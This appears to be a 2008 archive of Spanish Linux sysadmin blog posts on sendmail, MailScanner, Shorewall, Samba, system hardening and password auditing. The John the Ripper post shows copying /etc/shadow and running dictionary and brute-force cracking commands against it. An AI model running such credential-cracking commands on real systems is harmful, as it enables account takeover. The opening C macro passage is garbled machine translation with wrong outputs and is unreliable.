# Define showint (a) printf ( "% d \ n", a)
# Define incrint (a) a + +
Showint (300);
Incrint (bbls);
El siguiente es el resultado de preprocesamiento de las líneas anteriores:
Printf ( "% d \ n", 300);
(A) + a + (bbls)
■ Macro nombres no son sustituidas dentro de las cadenas, como en el ejemplo siguiente:
# Define BLOQUE 8192
Printf ( "El número BLOQUE. \ N");
La salida se ve así:
El número BLOQUE.
■ Un argumento pasado a una macro se puede "stringized" por su anterior nombre con
Un hash (#) de caracteres. En el siguiente ejemplo, la macro contiene el nombre MONCK
Stringized una versión de su argumento, que se combina con otras cadenas (por
Que se coloca cerca de los mismos):
# Define MONCK (ARGTERM) \
Printf ( "El término" # ARGTERM "es una cadena \ n")
MONCK (punto A al punto B);
La salida se ve así:
El término A de B es una cadena

INSTALL SEND MAIL

2008-01-18T11:17:00.000-08:00

Instalacion de sendmail. En centos

1-Programática requerida.
•
sendmail
•
make
•
sendmail-cf
•
cyrus-sasl
•
dovecot (o bien imap)
•
cyrus-sasl-md5
•
m4
•
cyrus-sasl-plain
2- [root@localhost .ssh]# service saslauthd start
Iniciando saslauthd: [ OK ]
[root@localhost .ssh]# chkconfig saslauthd on

3- dominios que vamos a administrar
[root@localhost mail]# vim /etc/mail/local-host-names

# local-host-names - include all aliases for your machine here.
ekxo.com
curso03.factor.com
falkon.com.mx
linux.net.mx

4-dominios que tengo de manera local (copia de loca-host-names) ( reenvio de correo electronico)

[root@localhost mail]# touch /etc/mail/relay-domains
[root@localhost mail]# vim /etc/mail/relay-domains
ekxo.com
curso03.factor.com
falkon.com.mx
linux.net.mx
5-[root@localhost mail]# yum install bind-utils
tiene varias herramientas para la prueba de dns.
root@localhost mail]# host generis.com.mx
(el servidor principal es que que tiene el que tenga la prioridad mas baja)
generis.com.mx has address 200.56.247.14
generis.com.mx mail is handled by 50 web.orvon.com.mx.
generis.com.mx mail is handled by 10 correo.orvon.com.mx.
6-Configuracion
[root@localhost mail]# vim /etc/mail/sendmail.mc
DESCOMENTAR LAS LINEAS -ELIMINANDO EL DNL Y EL ESPACIO.
dnl TRUST_AUTH_MECH(`EXTERNAL DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl
dnl define(`confAUTH_MECHANISMS', `EXTERNAL GSSAPI DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl
BUSCAR LA LINEA
DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl
SI QUEREMOS ENVIAR Y RECIBIR CORREO DESDE Y HACIA AFUERA ESTA LINEA NO NOS SIRVE HAY QUE BORRAR Addr=127.0.0.1.
ASI
DAEMON_OPTIONS(`Port=smtp,Name=MTA')dnl

7-Poner el dominio principal (si estan comentadas descomentarlas)
MASQUERADE_AS(`ekxo.com')dnl y descomentar las siguentes lienas
FEATURE(masquerade_envelope)dnl
FEATURE(masquerade_entire_domain)dnl
8-verificar que existan estas 3 lineas

* FEATURE(`virtusertable', `hash -o /etc/mail/virtusertable.db')dnl (pequeña base de datos que te permiten tener varios buzones de correo hacia un solo usuario esto es para la entrada de correo)

* FEATURE(`genericstable', `hash -o /etc/mail/genericstable.db')dnl
(te permite tener un solo usuario hacia una sola cuenta de correo esto es para la salida)

* GENERICS_DOMAIN_FILE(`/etc/mail/genericstable')dnl
( si no estan las ponemos)
8.crear usuarios
[root@localhost mail]# useradd falkon
[root@localhost mail]# passwd falkon
Changing password for user falkon.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

9-editar
[root@localhost mail]# vim /etc/mail/virtusertable
jonathan@ekxo.com jonathan
falkon@falkon.com.mx jonathan

10-crear el archivo genericstable
[root@localhost mail]# touch /etc/mail/genericstable y editarlo
ekxo.com jonathan@ekxo.com
falkon.com.mx jonathan@falkon.com.mx

crear generics-domains
[root@localhost mail]# touch /etc/mail/generics-domains (metemos ahi los dominios con los cuales ocupamos el enmascaramiento)
ekxo.com
falkon.com.mx

11-creamos la base de datos
[root@localhost mail]# makemap hash /etc/mail/genericstable.db < /etc/mail/genericstable
[root@localhost mail]# makemap hash /etc/mail/virtusertable.db < /etc/mail/virtusertable

12- iniciar servicio
[root@localhost mail]# service sendmail restart
esactivación de sm-client: [ OK ]
Apagando sendmail: [ OK ]
Iniciando sendmail: [ OK ]
Inicio de sm-client: [ OK ]
13- comprobar
[root@localhost mail]# service sendmail restart
Desactivación de sm-client: [ OK ]
Apagando sendmail: [ OK ]
Iniciando sendmail: [ OK ]
Inicio de sm-client: [ OK ]
[root@localhost mail]# chkconfig httpd on
13-editar
[root@localhost mail]# vim /etc/dovecot.conf
descomentar = protocols = imap imaps pop3 pop3s

reiniciar
[root@localhost mail]# service dovecot restart
Parando Dovecot Imap: [ OK ]
Iniciando Dovecot Imap: [ OK ]
14-[root@localhost mail]# chkconfig dovecot on
15-abrir un explorer

INSTALAR RPM

[root@localhost mail]# rpm -Uhv http://apt.sw.be/packages/rpmforge-release/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
Retrieving http://apt.sw.be/packages/rpmforge-release/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
warning: /var/tmp/rpm-xfer.kaZkHy: Header V3 DSA signature: NOKEY, key ID 6b8d79e6
Preparing... ########################################### [100%]
1:rpmforge-release ########################################### [100%]
INSTALAR MAILSCANER

1-instalar las fuentes del kernel con la version en especifico
[root@localhost mail]# uname -r
2.6.18-8.el5
[root@localhost mail]# yum install kernel-devel-2.6.18-8.el5

Dependencies Resolved

=============================================================================
Package Arch Version Repository Size
=============================================================================
Installing:
kernel-devel i686 2.6.18-8.el5 base 4.5 M

Transaction Summary
=============================================================================
Install 1 Package(s)
Update 0 Package(s)
Remove 0 Package(s)
Installed: kernel-devel.i686 0:2.6.18-8.el5
Complete!

[root@localhost mail]# yum -y install clamav clamav-db unrar spamassasin kernel-headers-2.6.18-8.el5 gcc gcc-c++ rpm-build gmp
Dependencies Resolved

=============================================================================
Package Arch Version Repository Size
=============================================================================
Installing:
clamav i386 0.91.1-1.el5.rf rpmforge 1.1 M
clamav-db i386 0.91.1-1.el5.rf rpmforge 10 M
gcc i386 4.1.1-52.el5.2 updates 4.9 M
gcc-c++ i386 4.1.1-52.el5.2 updates 3.3 M
rpm-build i386 4.4.2-37.el5 base 548 k
unrar i386 3.7.4-1.el5.rf rpmforge 111 k
Installing for dependencies:
elfutils i386 0.125-3.el5 base 163 k
elfutils-libs i386 0.125-3.el5 base 105 k
glibc-devel i386 2.5-12 base 2.0 M
glibc-headers i386 2.5-12 base 605 k
libgomp i386 4.1.1-52.el5.2 updates 69 k
libstdc++-devel i386 4.1.1-52.el5.2 updates 9.4 M

Transaction Summary
=============================================================================
Install 12 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 32 M

Installed: clamav.i386 0:0.91.1-1.el5.rf clamav-db.i386 0:0.91.1-1.el5.rf gcc.i386 0:4.1.1-52.el5.2 gcc-c++.i386 0:4.1.1-52.el5.2 rpm-build.i386 0:4.4.2-37.el5 unrar.i386 0:3.7.4-1.el5.rf
Dependency Installed: elfutils.i386 0:0.125-3.el5 elfutils-libs.i386 0:0.125-3.el5 glibc-devel.i386 0:2.5-12 glibc-headers.i386 0:2.5-12 libgomp.i386 0:4.1.1-52.el5.2 libstdc++-devel.i386 0:4.1.1-52.el5.2
Complete!

Instalación de MailSCANER
(Meta herramienta: herramienta que utiliza otras herramientas , tiene la capacidad de tnef ,filtros personalizados ,ciertos ficheros ,manejo de lista de bloqueos DNSBL = DOMAIN NAME SERVER BLOCK LIST , RBLS= )
tnef(protocolo para correos enviados desde outlook es de microsoft)
1- sendmail previamente configurado
antispam (mailscaNER no requiere que spamasasin este configurado)

2-bajarlo
[root@localhost MailScanner-4.62.9-3]# wget -c http://www.mailscanner.info/files/4/rpm/MailScanner-4.62.9-3.rpm.tar.gz

Descomprimirlo [root@localhost MailScanner-4.62.9-3]# tar -xvf MailScanner-4.62.9-3.rpm.tar.gz

Ir a la carpeta [root@localhost MailScanner-4.62.9-3]# cd MailScanner-4.62.9-3

correr el script install.sh
ya instalado

3- editar [root@localhost html]# vim /etc/MailScanner/MailScanner.conf
y configurar las variables

%org-name% = ekxo
%org-long-name% = linux-ekxo
%web-site% = www.ekxo.com
%report-dir% = /etc/MailScanner/reports/es
%rules-dir% = /etc/MailScanner/rules

configurar los parámetros generales de sistema

Quarantine Dir = /var/spool/MailScanner/quarantine
MTA = sendmail
Sendmail = /usr/bin/sendmail
Scan Messages = yes (utilizar reglas)
Reject Message = no(utilizar reglas)
Maximum Attachments Per Message = 200
Expand TNEF = yes
Use TNEF Contents = replace
Deliver Unparsable TNEF = no
Maximum Message Size = %rules-dir%/max.message.size.rules
archivo de max.message.size.rules
# This is an example ruleset to show how rules can have resulting values
# other than yes and no. This ruleset demonstrates having a numerical result.
# The From: and To: rules show how simple domains can be used to select
# different values for the result of the ruleset.
# Note that the fields of each rule line can be separated by any whitespace,
# any combination of tabs and spaces.
#
# The 2 lines involving domain3.com show that for email to user@domain3.com
# has a limit of 5Mbytes per message, while email to any other user
# @domain3.com has a limit of 500Kbytes per message.
#

To: *@domain1.com 10M
To: *@domain2.com 20M
From: user@domain3.com 5M
From: *@domain3.com 500K

#
# The following line specifies the default result used when none of the
# other rules match. In this example,
# Maximum Message Size = 0
# means that there is no limit to the size of the message.
#

To: ekxo@ekxo.com 80M
To: *@falkon 20M
From: carlos@ekxo.com 5M

FromOrTo: default 0
--------------------------------------------------------------------------------------------------------------------------

Maximum Attachment Size = -1
Minimum Attachment Size = -1

Configurar el sistema antivirus

Virus Scanning = yes
Virus Scanners = auto
Deliver Disinfected Files = no
Block Encrypted Messages = no (mensajes cifrados)
Block Unencrypted Messages = no
Allow Password-Protected Archives = no
Monitors for ClamAV Updates = /var/clamav/*.inc/*

ClamAVmodule Maximum Recursion Level = 8 (niveles a donde se mete a buscar en dado caso que esten un zio dentro de un zip)
ClamAVmodule Maximum Files = 1000
ClamAVmodule Maximum File Size = 10000000 # (10 Mbytes)
ClamAVmodule Maximum Compression Ratio = 250

# Clamd only: configuration options for using the clamd daemon.
# 1. The port to use when communicating with clamd via TCP connection
# 2. The Socket, or IP to use for communicating with the clamd Daemon.
# You enter either the full path to the UNIX socket file or the IP
# address the daemon is listening on.
# 3. The ClamD Lock file should be created by clamd init script in most
# cases. If it is not then the entry should be blank.
# 4. If MailScanner is running on a system with more then 1 CPU core (or
# more than 1 CPU) then you can set "Clamd Use Threads" to "yes" to
# speed up the scanning, otherwise there is no advantage and it should
# be set to "no".
#
# None of these options can be the filenames of rulesets, they must be just
# simple values.
Clamd Port = 3310
Clamd Socket = /tmp/clamd
Clamd Lock File = # /var/lock/subsys/clamd
Clamd Use Threads = no

Contenido peligros Phising

Dangerous Content Scanning = yes
Allow External Message Bodies = no
Find Phishing Fraud = yes
Also Find Numeric Phishing = yes
Highlight Phishing Fraud = yes
Phishing Safe Sites File = %etc-dir%/phishing.safe.sites.conf
Convert Dangerous HTML To Text = yes
Convert HTML To Text = no
Deny Filenames =\.exe$ \.bat$
Deny Filetypes =executable script
Filetype Rules = %etc-dir%/filetype.rules

Reportes y respuestas automaticas

Quarantine Infections = yes
Include Scanner Name In Reports = no
Inline HTML Signature = %report-dir%/inline.sig.html
Inline Text Signature = %report-dir%/inline.sig.txt

Notificar remitentes

Notify Senders = yes
Notify Senders Of Viruses = no
Notify Senders Of Blocked Size Attachments = no

SPAM

Spam Domain List = SORBS-BADCONF SORBS-NOMAIL
Spam Lists To Reach High Score = 3
Spam Lists To Be Spam = 1

Is Definitely Not Spam = %rules-dir%/spam.whitelist.rules
Is Definitely Spam = no
Definite Spam Is High Scoring = yes

SpamAssassin

Use SpamAssassin = yes

AL FINALIZAR LA CONFIGURACION
MRTG
1-[root@localhost html]# service sendmail stop
2-[root@localhost html]# service MailScanner restart
Shutting down MailScanner daemons:
MailScanner: [ OK ]
incoming sendmail: [ OK ]
outgoing sendmail: [ OK ]
Waiting for MailScanner to die gracefully ... dead.
Starting MailScanner daemons:
incoming sendmail: [ OK ]
outgoing sendmail: [ OK ]
MailScanner: [ OK ]
3-[root@localhost html]# chkconfig sendmail off (se va ejecutar sendmail como hijo de mailscanner)
4-[root@localhost html]# chkconfig MailScanner on

INSTALL CENTOS

2008-01-18T11:14:00.000-08:00

Instalacion centos

Paso 1 linux text lang=text vga=791 (parámetros mas usados)
Paso 2 selección del teclado es
Paso 3 selecciona tipo de sistema a instalar
Opciones
1.Workstation ambiente (grafico y sistema)
2.escritorio (suite de oficina navegador)
3.custom (te da a escoger que paquetes selecciona)
4.server

Paso 4 partcionamiento

Escoger disk druid pariticionamiento manual
Crear 6 particiones importantes: boot,(128mb) ,swap (la memoria x 2), / raiz (10 gb ), tmp (10 gb),var (50%de lo que queda),home (50%de lo que queda).

Nota: 4 particiones fisicas primarias
Osea 3 particiones primarias y una extendida.

Tipo de sistemas de archivos ext3

Paso 5 escoger gestor de arranque si deseamos.

Paso 6 configurar eth0 con dhcp
Paso 7 configurar el nombre del host
Paso 8 configurar cortafuegos.
Paso 9 selinux security enhanced (permite que cierta aplicación se ejecute cierto usario y puerto y es muy restrictivo)

Nota : shorewall fw.

Paso 10 selecccionar idioma y el idioma por defecto.
Paso 11 seleccionar el uso horario.
Paso 12 seleccionar contrasea de root.
No debe ser una palabra .
Utileria para crear contraseas

2008-01-17T13:07:00.000-08:00

Samba un poco basico!!

1-esto es basico en samba

mkdir /sigma/kb

chmod -R 775 /sigma/kb/

chmod -R g+s /sigma/kb/

NOTA: UTILIZAMOS EL BIT PEGAJOSO PARA UN MEJOR MANEJO DE NUESTRO SHARE VALE!!!

groupadd kb

chgrp -R kb /sigma/kb/

compartir en red:

crear entrada en /etc/samba/smb.conf

[kb]

path = /sigma/kb

valid users = @kb

public = no

writable = yes

printable = no

create mask = 0775

directory mask = 0775

asignar permisos a usuarios:

en /etc/group

kb:x:544:atellezlinares,licmj,mlopez

reiniciar servicio

/etc/rc.d/init.d/smb restart

2008-01-17T13:03:00.000-08:00

Shorewall fw 4 linux on fc7

Shorewall

shorewall

1 Instalando y bajando

[root@localhost html]# wget http://www1.shorewall.net/pub/shorewall/3.4/shorewall

3.4.5/shorewall3.4.51.noarch.rpm

14:19:37 http://www1.shorewall.net/pub/shorewall/3.4/shorewall3.4.5/shorewall3.4.5

1.noarch.rpm

Resolviendo www1.shorewall.net...206.124.146.177

Connecting to www1.shorewall.net|206.124.146.177 |:80... conectado.

Petición HTTP enviada, esperando respuesta... 200 OK

Longitud: 218476 (213K) [application/xrpm]

Saving to: `shorewall3.4.51.noarch.rpm'

100%[===================================================================

=================>] 218.476 16,7K/s in 10s

14:19:48 (20,7 KB/s) `shorewall3.4.51.noarch.rpm' saved [218476/218476]

[root@localhost html]# rpm ivh shorewall3.4.51.noarch.rpm

warning: shorewall3.4.51.noarch.rpm:Header V3 DSA signature: NOKEY, key ID 6c562ac4

Preparing... ########################################### [100%]

1:shorewall ########################################### [100%]

2[root@localhost rules]# cd /etc/shorewall/

[root@localhost shorewall]# vim zones

definimos las zonas

# Shorewall version 3.4 Zones File

# For information about this file, type "man shorewallzones"

# For more information, see http://www.shorewall.net/Documen tation.htm#Zones

###############################################################################

#ZONE TYPE OPTIONS IN OUT

# OPTIONS OPTIONS

fw firewall

net ipv4

#LAST LINE ADD YOUR ENTRIES ABOVE THIS ONE DO NOT REMOVE

#solamente se pueden meter 5 caracteres para las zonas

3definir interfaces

[root@localhost shorewall]# vim interfaces

# Shorewall version 3.4 Interfaces File

# For information about entries in this file, type "man shorewallinterfaces"

# For additional information, see

# http://shorewall.net/Documenta tion.htm#Interfaces

###############################################################################

#ZONE INTERFACE BROADCAST OPTIONS

net eth0 detect

#loc eth1 detect

#dms eth2 detect

#LAST LINE ADD YOUR ENTRIES BEFORE THIS ONE DO NOT REMOVE

4Definir politicas

[root@localhost shorewall]# vim policy

# Shorewall version 3.4 Policy File

# For information about entries in this file, type "man shorewallpolicy"

# See http://shorewall.net/Documentat on.htm#Policy for additional information.

###############################################################################

#SOURCE DEST POLICY LOG LIMIT:BURST

# LEVEL

#MODO SOMBRA

net fw DROP

#MODO SOMBRA

fw net ACCEPT

all all REJECT info

#dmz fw ACCEPT

#fw dmz ACCEPT

#loc fw ACCEPT

#fw loc ACCEPT

#LAST LINE DO NOT REMOVE

4Definimos reglas

[root@localhost shorewall]# vim rules

# Shorewall version 3.4 Rules File

# For information on the settings in this file, type "man shorewallrules"

# See http://shorewall.net/Documentat on.htm#Rules for additional information.

#################################################################################

############################

#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE

USER/ MARK

ACCEPT net fw tcp 80,25,110

ACCEPT net fw tcp 53

ACCEPT net fw udp 53

#ACCEPT loc dmz tcp 80,25,110,143

#DNAT net dmz:10.1.76.12 tcp 25

#DNAT net dmz:10.1.76.94 tcp 80,8080,443

#REDIRECT net loc:192.168.3.4 5604 tcp 5900

#PORT FORDWARDING ON REDIRECT C

# PORT PORT(S) DEST LIMIT GROUP

#SECTION ESTABLISHED

#SECTION RELATED

#SECTION NEW

#LAST LINE ADD YOUR ENTRIES BEFORE THIS ONE DO NOT REMOVE

5Iniciar el firewall

[root@localhost ~]# service shorewall start

Shorewall is already running

[root@localhost ~]# service shorewall stop

Stopping Shorewall...

IP Forwarding Enabled

done.

[root@localhost ~]# service shorewall start

Compiling...

Initializing...

Determining Zones...

IPv4 Zones: net

Firewall Zone: fw

Validating interfaces file...

Validating hosts file...

Preprocessing Actions...

Preprocessing /usr/share/shorewall/action.Drop...

Preprocessing /usr/share/shorewall/action.Reject...

Validating Policy file...

Determining Hosts in Zones...

net Zone: eth0:0.0.0.0/0

Deleting user chains...

Compiling /etc/shorewall/routestopped ...

Creating Interface Chains...

Compiling Common Rules

Compiling IP Forwarding...

Compiling /etc/shorewall/rules...

Compiling Actions...

Compiling /usr/share/shorewall/action.Drop for Chain Drop...

Compiling /usr/share/shorewall/action.Reject for Chain Reject...

Compiling /etc/shorewall/policy...

Compiling Traffic Control Rules...

Compiling Rule Activation...

Shorewall configuration compiled to /var/lib/shorewall/.start

Processing /etc/shorewall/params ...

Starting Shorewall....

Initializing...

Processing /etc/shorewall/init ...

Clearing Traffic Control/QOS

Deleting user chains...

Processing /etc/shorewall/continue ...

Enabling Loopback and DNS Lookups

Creating Interface Chains...

Setting up SMURF control...

Processing /etc/shorewall/initdone ...

Setting up Black List...

Setting up ARP filtering...

Setting up Accept Source Routing...

IP Forwarding Enabled

Setting up SYN Flood Protection...

Setting up Rules...

Setting up Actions...

Creating action chain Drop

Creating action chain Reject

Creating action chain dropBcast

Creating action chain dropInvalid

Creating action chain dropNotSyn

Applying Policies...

Activating Rules...

Processing /etc/shorewall/start ...

Processing /etc/shorewall/started ...

done.

BLINDAJE DEL SISTEMA 4

2008-01-15T11:52:00.000-08:00

OKAS COMO VIMOS QUE ONDA EN EL 3 PUES PODEMOS HACER USO DE CONSOLAS PERO QUE PASA SI UN USUARIO QUE YA NO TIENE ACCESO A LAS CONSOLAS RESTRINGIDAD QUIERE HACER USO DE LA MAGICA PALABRA!!!

ANILLO DE ROCA LA MOLE QUIERO SER !! EN ESTE CASO sera
[root@desarrollo console.apps]# su -l
pues si se convierte en root no y pues eso no puede ser solo para usuarios autorizados no cualquiera brinca en nuestro tapete!!! o que so todos!!!o todas!!! jaaa
bueno en realidad son herrmientas administrativas pero que pueden llegar a ser algo inseguras
vamos a checar el siguiente fichero-

[root@desarrollo ~]# vim /etc/pam.d/su
***************************************************
#%PAM-1.0
auth sufficient pam_rootok.so
# Uncomment the following line to implicitly trust users in the "wheel" group.
#auth sufficient pam_wheel.so trust use_uid
# Uncomment the following line to require a user to be in the "wheel" group.
#auth required pam_wheel.so use_uid
auth include system-auth
account sufficient pam_succeed_if.so uid = 0 use_uid quiet
account include system-auth
password include system-auth
session include system-auth
session optional pam_xauth.so

***********************************************************

bueno aqui lo hay que hacer es que descomentar la siguientes lineas

auth sufficient pam_wheel.so trust use_uid

y bueno con esto lo guardamos y ahora entren la consola 2 por ejemplo y traten de comvertirse en root y jaaa talannnnnnnn!!! bueno con esto debemos tomar en cuenta que tenemos que administrar bien nuestro sistema si no esto srive pa pura madre me refiero a los grupos de trabajo!!!y usuarios aqui solo los chidos estaran en el grupo wheel ok..

bueno los podemos manejar editan el fichero:

[root@desarrollo ~]# vim /etc/group

se recomienda DESABILITAR CUENTAS NO UTILIZADAS y grupos

BLINDAJE DEL SISTEMA 3

2008-01-15T11:38:00.000-08:00

AHORA VEREMOS OTRO TIPO DE MADRES QUE NOS PUEDEN JODER .NUESTRO SISTEMA,,
BUENO YA NOS DIMOS CUENTA QUE TENEMOS 6 TTY Y UNA GRAFICA VALE,..BUENO EN LA BUENA ADMINISTRACION SE RECOMIENDA NO ES AHUEVO!!! REPITO NO ES AHUEVO ES SOLO POR SEGURIDAD..QUE TENGAMOS SOLO 3 CONSOLAS

1ERO CHEQUEMOS ESTE FICHERO

vim /etc/securetty

VEREMOS LO SIGUIENTE:
***********************************************
console
vc/1
vc/2
vc/3
vc/4
vc/5
vc/6
vc/7
vc/8
vc/9
vc/10
vc/11
tty1
tty2
tty3
tty4
tty5
tty6
tty7
tty8
tty9
tty10
tty11
~
************************+
COMO SE PODRAN DAR CUENTA HAY VARIAS TTY'S AHORA PARA DESABILITARLAS SOLO DAREMOS UN ESPACIO ANTES DE LA TTY ASI:
_tty3
_tty4
_tty5
_tty6

NOTA:EL SIGNO'_' ES UN ESPACIO ANTES..

BUENO ME FALTO DECIRLES QUE HAY QUE EDITARLO Y VA QUEDAR LISTO PARA DESAHABILITAR ESS CONSOLAS..GUARDENLO E INTENTEN CON CTR+ALT+F3 ENTRAR A LA TTY3 POR EJEMPLO SE DARAN CUENTA QUE YA SE LA PELARON NO PUEDEN ENTRAR AHORA HAGANLO CON LA TTY1 Y VERAN QUE NO HAY PEX...
ESTO ES CON EL FIN DE NO DEJAR PUERTAS ABIERTAS A CUALQUIER OGT QUE SE QUIERA PASAR DE V...EN FIN

BLINDAJE DEL SISTEMA 2

2008-01-15T11:26:00.000-08:00

OKAS SEGUIMOS CON EL BLINDAJE AHORA CON OTRO TIPO DE ACCIONES
BUENO COMO SE PODRAN DAR CUENTA UN USUARIO AÑADIDO PODRA SER USO DE VARIOS COMANDOS QUE PUEDEN LLEGAR A SER DAÑINOS POR EJEMPLO SI UN USUARIO EJECUTA EL SHUTDOWN NOS TIRA EL SISTEMA Y NO HAY NECESIDAD DE SER ROOT PARA HACERLO A SI QUE DEBENOS PROTEGERNOS DE ESTO.

ahora entremos a este directorio
[root@desarrollo base]# vim /etc/security/console.apps/
veremos lo siguiente
**********************************************************

authconfig kbdrate pm-suspend-hybrid system-config-authentication system-config-network-cmd
authconfig-gtk neat poweroff system-config-display system-config-securitylevel
authconfig-tui pm-hibernate reboot system-config-firewall system-config-services
eject pm-powersave serviceconf system-config-language system-config-users
halt pm-suspend setup system-config-network

************************************************

si queremos quitar el reboot por ejemplo haremos lo siguiente..

[root@desarrollo console.apps]# mv reboot reboot.defaul

bueno prueben esto creen un usuario y despues entren al sistema con este ahora intenten tirar el sistema con reboot y veran que ya se la pelo...!!!!!!!!!!!!
solo root (the good) podra hacerlo ..

BLINDAJE DEL SISTEMA 1

2008-01-15T11:06:00.000-08:00

HOLA PUES ESTE POST VA TRATAR MAS HACERCA DE LA SEGURIDAD DE NUESTRO SISTEMA BUENO POR LO MENOS AMI ME LLAMA MUCHO LA ATENCION...
VEAMO QUE PEX...

Como sabemos en nuestro sistema tenemos la ayuda del history por si queremos repetir un comando ya escrito en nuestra mamda consola jaa eso que!! bueno pues un hacker puede tener acceso a todo que le hagamos en nuestra session. y utlizar esa informacion para su beneficio pues hay les va.

Por default nuestro sistema admite 1000 lineas en este archivo lo acorto para no hacer este post mas largo
ejemplo

[root@desarrollo base]# tail -5 /root/.bash_history
pwd
ls -l
pwd
exit
exit

Lo 1ero que debemos hacer es editar el siguiente archivo..

[root@desarrollo base]# vim /etc/profile

veremos lo siguiente

*****************************************
# /etc/profile

# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrc

pathmunge () {
if ! echo $PATH | /bin/egrep -q "(^|:)$1($|:)" ; then
if [ "$2" = "after" ] ; then
PATH=$PATH:$1
else
PATH=$1:$PATH
fi
fi
}

# ksh workaround
if [ -z "$EUID" -a -x /usr/bin/id ]; then
EUID=`id -u`
UID=`id -ru`
fi

# Path manipulation
if [ "$EUID" = "0" ]; then
pathmunge /sbin
pathmunge /usr/sbin
pathmunge /usr/local/sbin
fi

# No core files by default
ulimit -S -c 0 > /dev/null 2>&1

if [ -x /usr/bin/id ]; then
USER="`id -un`"
LOGNAME=$USER
MAIL="/var/spool/mail/$USER"
fi

HOSTNAME=`/bin/hostname`
HISTSIZE=1000

1,1 Comienzo

if [ -z "$INPUTRC" -a ! -f "$HOME/.inputrc" ]; then
INPUTRC=/etc/inputrc
fi

export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE INPUTRC

for i in /etc/profile.d/*.sh ; do
if [ -r "$i" ]; then
. $i
fi
done

unset i
unset pathmunge
54,1 Final

*****************************************************

COMO VERAN ES EL COMPORTAMIENTO DEL SISTEMA BUENO MODIFIQUEMOS ESTE CODIGO CON UNA SENCILLA LINEA
ESTA HISTSIZE=1000
POR ESTA
HISTSIZE=0

ASI HAREMOS QUE EL HOSTORY SEA 0 Y ASI NO PODRAN VER QUE ES LO QUE HICIMOS EN NUESTRA SESSION
LO MALO ES QUE ES GLOBAL Y TODOS LOS USUARIO TENDRA ESTA RESTRICCION.

2008-01-13T19:26:00.000-08:00

INTEGRIDAD DE LOS DATOS CON MD5SUM

VEAMOS EL MANUAL

ekxo@victoria:~$ md5sum --help

Uso: md5sum [OPCION] [ARCHIVO]...

Muestra o verifica MD5 (128-bit) sumas de comprobación.

Sin ARCHIVO, o cuando es ARCHIVO -, lee la entrada estándar.

-b, --binary leer en modo binario

-c, --check leer MD5 sumas desde los archivos y los verifica

-t, --text leer en modo texto (por defecto)

Las siguientes dos opciones sólo son útiles al verificar sumas de comprobación:

--status no mostrar nada, el código de estado indica el éxito

-w, --warn avisa sobre líneas con un formato de sumas de comprobación inválido

--help muestra esta ayuda y finaliza

--version informa de la versión y finaliza

Las sumas se calculan tal y como se describe en RFC 1321. Al comprobar, la

entrada debe ser un resultado anterior de llamar a este programa. Por defecto

se muestra una línea con la suma de comprobación, un carácter indicando el tipo

de fichero (`*' para binario, ` ' para texto), y el nombre de cada FICHERO.

Comunicar errores a .

EJEMPLO:

ekxo@victoria:~$ md5sum /etc/passwd > key

ekxo@victoria:~$ md5sum -c key

/etc/passwd: La suma coincide

si el archivo fuese modificado pues veremos el msj de la ( la suma no coincide asi sabremos si nuestro ficheri ha sido modificado)

John the Ripper password cracker

2008-01-13T19:24:00.000-08:00

John the Ripper password cracker

HOLA!! Ahora vamos a ver que pex con mas seguridad ahora hacer de los passwords

el proyecto esta alijado en este sitio de donde lo podemos bajar necesitamos tener un compilador en este caso uso gcc de gnu

NOS CLAVAMOS EN EL directorio en el que extrajeron el código fuente de John. Introduzca el "src" ENTRAR EN EL subdirectorio y compilamos con make para obtener una lista de sistemas operativos para los que existe un apoyo específico:

cd src
make

TenEMOS QUE TEnER EN cuenta que el sistema y el tipo en el que vamos a utlizar esta herramienta

Make clean (SISTEMA) donde sistema es que nosotros elejimos para la instalacion

Donde el SISTEMA es apropiado DEJARLO EN BLANCO. Alternativamente, si su sistema no aparece en la lista, utiliza:

Make clean genéricos

Si todo va bien, esto creará los ejecutables de John y los servicios bajo ".. / run /".

Cd .. / run
. /John -- test

para provarlo y listo..

modo basico de uso!!! seria el siguiente

root@victoria:/home/ekxo/LINUX/john-1.7.2/run# cp /etc/shadow /home/ekxo/LINUX/john-1.7.2/run/
root@victoria:/home/ekxo/LINUX/john-1.7.2/run# ./john --wordlist:password.lst --rules shadow
Loaded 5 password hashes with 5 different salts (FreeBSD MD5 [32/32 X2])
guesses: 0 time: 0:00:02:44 100% c/s: 4230 trying: Zhongguing
este seria un ataque por diccionario.

en modo single seria asi!!

root@victoria:./john shadow

http://www.openwall.com/

estas son las formas mas basicas de uso pero aqui viene mas detalladas..
http://www.openwall.com/john/doc/

john the riper & bastille
la forma de uso es la siguiente va que va!!!
basicamente hay 2 formas de ataque a contraseña por diccionario o incremental ( fuerza bruta )

wordlist (archivo de palabra) - modo simple

john wordfile:password.lst /etc/shadow

john -w:archivo.diccionario -rules /etc/shadow

*singlecrack – usa informacion del login

jhon -single /etc/shadow

*incremental (fuerza bruta)

john -i /etc/shadow

jhon -i:Alpha /etc/shadow (a......z 26 caracteres)

jhon -i:All /etc/shadow (todo 95 caracteres)
root@victoria:/home/ekxo/john-1.7.2/run# ./john -i:All shadow
Loaded 5 password hashes with 5 different salts (FreeBSD MD5 [32/32])

jhon -i:digits (0...9 10 caracteres)

NOTA HAY QUE EVITARLOS PALINDROMOS (PALABRAS QUE SE LEEN IGUAL ALD RECHO O AL REVEZ) en la CREACION DE PASSWORDS
EJEMPLO:

ANITA LAVA LA TINA

LIGAS:!!!!!!!

http://www.openwall.com/john/
**************************************************************************************************
BUENO BASTILLE ES UNA HERRAMIENTA PARA BLINDAR EN OTRO POST HABLAMOS DE ELLA..
PERO LES DEJO LA LIGA..

http://bastille-linux.sourceforge.net/perl_rpm_chart.htm

[root@desarrollo src]# yum install perl-Tk

[root@desarrollo src]# wget
http://prdownloads.sourceforge.net/bastille-linux/Bastille-3.0.9-1.0.noarch.rpm

2008-01-12T08:13:00.000-08:00

INSTALACION SEGURA DESATENDIDA

Para realizar una instalacion desantendida para RHLE V4 CON KICKSTAR

Servidor

